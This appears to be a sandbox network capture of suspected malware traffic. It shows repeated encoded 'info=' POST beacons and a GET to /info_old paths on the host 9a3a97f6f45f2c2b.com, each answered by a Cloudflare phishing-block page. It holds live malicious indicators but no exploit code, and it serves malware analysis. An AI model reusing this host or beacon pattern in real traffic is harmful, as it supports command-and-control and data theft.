                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chr
                                                                                                                                                                Mar 7, 2021 19:21:26.950779915 CET937INData Raw: 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22
                                                                                                                                                                Data Ascii: ome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,pro
                                                                                                                                                                Mar 7, 2021 19:21:26.950814962 CET939INData Raw: 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22 3e 0a
                                                                                                                                                                Data Ascii: > <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acquir
                                                                                                                                                                Mar 7, 2021 19:21:26.950838089 CET940INData Raw: 20 70 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 54 72 75 73 74 20 26 61 6d 70 3b 20 53 61 66 65 74 79 20 74 65 61 6d 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f
                                                                                                                                                                Data Ascii: please contact the Trust &amp; Safety team for more information.</p> </div> </div> </div>... /.section --> <div class="cf-error-footer cf-wrapper w-240 lg:w-full py-10 sm:py-4 sm:px-8 mx-auto text-center sm:tex
                                                                                                                                                                Mar 7, 2021 19:21:26.950851917 CET940INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                Data Ascii: 0
                                                                                                                                                                Mar 7, 2021 19:21:27.087616920 CET942OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:27.087721109 CET942OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 59 78 79 52 74 30 2d 55 66 67 31 55 39 49 4e 49 4d 43 39 70 39 77 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVYxyRt0-Ufg1U9INIMC9p9w~
                                                                                                                                                                Mar 7, 2021 19:21:27.143291950 CET965INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:27 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d4c0cb31064e271fa3aa9579a78cf5ac81615141287; expires=Tue, 06-Apr-21 18:21:27 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af854cd30000069abb2d6000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=vzObZv23%2B2dc%2FEzQuNQ9jGCXlUT7u4h%2FaqJgYJLPnD5EYYctEhgjEfmtiq3bgzVu%2FZ9qmMawdWdKHwTSWTiEQiA44ahm244546U8x0eVrZliQWwABg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7f48c03069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,c
                                                                                                                                                                Mar 7, 2021 19:21:27.143326998 CET966INData Raw: 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72
                                                                                                                                                                Data Ascii: hrome=1" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/styles/cf.errors.css" type="text/css" media="screen,p
                                                                                                                                                                Mar 7, 2021 19:21:27.143744946 CET967INData Raw: 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 73 20 74 77 6f 22
                                                                                                                                                                Data Ascii: --> <div class="cf-section cf-wrapper"> <div class="cf-columns two"> <div class="cf-column"> <h2>What is phishing?</h2> <p>This link has been flagged as phishing. Phishing is an attempt to acqu
                                                                                                                                                                Mar 7, 2021 19:21:28.347409010 CET973OUTPOST /info_old/g HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 1393
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:28.347574949 CET974OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 57 38 59 47 58 55 47 63 4a 56 39 64 37 58 35 54 43 69 63 68 42 6c 4a 50 55 77 4e 61 67 2d 46 6e 59 69 57 45 46 6e 48 6c 6d 72 34 6a 4d 43 6d 65 68 30 6c 57 72 44 52 74 71 54 69 66 48 47 71 31 31 34 6e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTW8YGXUGcJV9d7X5TCichBlJPUwNag-FnYiWEFnHlmr4jMCmeh0lWrDRtqTifHGq114n62eLqovS6CpRvHelxHsYQgfv6UkXl9SOQ3fJGNAl0SOHxdBt-mzqzLtF98GX34K7DUbnLA3B7z_F9ZaMU_1ht8a5FFRze3pVlVMeB6SvamWkVzMhkgBSP5Zuu__3jp5BNNiOjDhJSEKvzkd5N9ciRSH_X0MDSAlq0
                                                                                                                                                                Mar 7, 2021 19:21:28.401530027 CET976INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d8d97df32c6eac1fa6ba938a3d57aa15f1615141288; expires=Tue, 06-Apr-21 18:21:28 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8551bf0000069a8606c000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=1kUe9fj1%2BFN9ca0sSDcrGgFPRhK86VM6RbKfyNqUZrcU7nQxD28gxiSWsrzdlYxWoOPQ%2FEkzWg0BOYzI89KagsXR%2Fc63noXGXqW4nuXijAfHf85HLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7fc6915069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chr
                                                                                                                                                                Mar 7, 2021 19:21:28.563278913 CET981OUTPOST /info_old/w HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Content-Length: 81
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:28.563522100 CET981OUTData Raw: 69 6e 66 6f 3d 57 79 53 41 6e 62 58 6a 57 54 56 55 2d 51 62 38 74 50 46 55 69 49 63 37 71 61 73 54 53 41 70 4b 38 35 4b 2d 4a 71 42 34 57 79 32 77 30 67 6f 35 4c 5a 74 58 56 54 73 53 51 77 4d 54 49 33 54 34 75 51 75 36 42 57 4d 67 78 70 67 7e
                                                                                                                                                                Data Ascii: info=WySAnbXjWTVU-Qb8tPFUiIc7qasTSApK85K-JqB4Wy2w0go5LZtXVTsSQwMTI3T4uQu6BWMgxpg~
                                                                                                                                                                Mar 7, 2021 19:21:28.615767956 CET982INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d8d97df32c6eac1fa6ba938a3d57aa15f1615141288; expires=Tue, 06-Apr-21 18:21:28 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8552970000069acdbf4000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=gRi15HGcc4Tl%2BV1AN05CjctDW4TEhyIwyDaJu0jx86jDiRJzRJ74HeeoajiqiT6rFu2QPJYf%2BNSK%2B6FNIQm8fl6Wrfmkk1s%2Ba%2BQBNSrmqxr4mPCZGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7fdbc99069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65
                                                                                                                                                                Data Ascii: 10d3<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Suspected phishing site | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge
                                                                                                                                                                Mar 7, 2021 19:21:28.757026911 CET987OUTGET /info_old/r HTTP/1.1
                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                                                                                                                                                                Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7
                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36
                                                                                                                                                                upgrade-insecure-requests: 1
                                                                                                                                                                Host: 9a3a97f6f45f2c2b.com
                                                                                                                                                                Mar 7, 2021 19:21:28.808964968 CET989INHTTP/1.1 200 OK
                                                                                                                                                                Date: Sun, 07 Mar 2021 18:21:28 GMT
                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                Set-Cookie: __cfduid=d8d97df32c6eac1fa6ba938a3d57aa15f1615141288; expires=Tue, 06-Apr-21 18:21:28 GMT; path=/; domain=.9a3a97f6f45f2c2b.com; HttpOnly; SameSite=Lax
                                                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                                                cf-request-id: 08af8553580000069acd80f000000001
                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=jZatBTkSU177GiU1hxErPYYMS29%2BHteqeQl%2BOrCet0kEgIZhKnlRxiAMNUQ8nczgr6e8lq9VMPiyc9mrcdzBpX7jdK%2FZAexmYZs1hBKxDo5TwKBKZg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                NEL: {"max_age":604800,"report_to":"cf-nel"}
                                                                                                                                                                Server: cloudflare
                                                                                                                                                                CF-RAY: 62c5d7feffc5069a-LHR
                                                                                                                                                                alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                Data Raw: 31 30 64 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 53 75 73 70 65 63 74 65 64 20 70 68 69 73 68 69 6e 67 20 73 69 74 65 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72
